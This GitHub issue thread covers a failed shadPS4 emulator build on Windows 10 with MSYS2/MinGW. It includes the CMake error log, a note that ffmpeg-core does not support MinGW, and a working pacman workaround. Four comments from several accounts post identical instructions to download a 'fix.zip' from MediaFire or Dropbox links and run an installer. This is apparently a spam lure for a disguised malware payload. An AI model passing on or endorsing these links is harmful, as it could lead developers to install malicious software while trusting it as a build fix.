### ISSUE TITLE
windows 10 wont build

### ISSUE THREAD

**Issue by Kubmichna** [shadps4-emu/shadPS4#588]
i wanted to download shadPS4 on my windows 10 pc but whenever i try i get this error on the cmake -S . -B build -DCMAKE_CXX_COMPILER="clang++.exe" -DCMAKE_C_COMPILER="clang.exe" -DCMAKE_CXX_FLAGS="-O2 -march=native"
step 

CMake Warning (dev) at CMakeLists.txt:68 (find_package):
  Policy CMP0144 is not set: find_package uses upper-case <PACKAGENAME>_ROOT
  variables.  Run "cmake --help-policy CMP0144" for policy details.  Use the
  cmake_policy command to set the policy and suppress this warning.

  CMake variable BOOST_ROOT is set to:

    C:/msys64/home/user/shadPS4/externals/ext-boost

  For compatibility, find_package is ignoring the variable, but code in a
  .cmake module might still use it.
This warning is for project developers.  Use -Wno-dev to suppress it.

-- Could NOT find Boost (missing: Boost_DIR)
-- Could NOT find FFmpeg: (Required is at least version "5.1.2") (found )
-- Could NOT find fmt (missing: fmt_DIR)
-- Could NOT find glslang (missing: glslang_DIR)
-- Could NOT find magic_enum (missing: magic_enum_DIR)
-- Could NOT find RenderDoc (missing: RENDERDOC_INCLUDE_DIR) (Required is at least version "1.6.0")
-- Could NOT find SDL3 (missing: SDL3_DIR)
-- Could NOT find toml11 (missing: toml11_DIR)
-- Could NOT find tsl-robin-map (missing: tsl-robin-map_DIR)
-- Could NOT find VulkanMemoryAllocator (missing: VulkanMemoryAllocator_DIR)
-- Could NOT find xbyak (missing: xbyak_DIR)
-- Could NOT find xxHash: (Required is at least version "0.8.2") (found )
-- Could NOT find zlib-ng: (Required is at least version "2.1.7") (found )
-- Could NOT find Zydis (missing: Zydis_DIR)
-- Could NOT find cryptopp: (Required is at least version "8.9.0") (found )
-- {fmt} version: 11.0.2
-- Build type: Release
=> Project : cryptopp-cmake v8.9.0
-- Crypto++ from user-specified location at: C:/msys64/home/user/shadPS4/externals/cryptopp/
-- Using branch HEAD for tests
=> Module : cryptopp
-- [cryptopp] CMake version 3.30.2
-- [cryptopp] System Windows
-- [cryptopp] Processor AMD64
-- [cryptopp] CMAKE_HOST_SYSTEM_PROCESSOR : AMD64
-- [cryptopp]      CMAKE_SYSTEM_PROCESSOR : AMD64
-- [cryptopp] Target architecture detected as: mingw64 -> CRYPTOPP_MINGW64
-- [cryptopp] Platform: MinGW-64
-- [cryptopp] Compiler definitions:
-- [cryptopp] Compiler options: -O2 -march=native
-- [cryptopp] Build type: Release
CMake Error at externals/ffmpeg-core/CMakeLists.txt:17 (message):
  Unsupported OS.

-- Configuring incomplete, errors occurred!

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by ash-kamrip** [comment]
facing the same issue  on windows 10

**Comment by sampletext32** [comment]
ffmpeg-core doesn't support building with mingw

**Comment by yipidee** [comment]
I had the same issue, but was able to get past it by installing the native package then building.

`pacman -S mingw-w64-x86_64-ffmpeg`

**Comment by Hermiten** [comment]
Any update @Kubmichna  ?
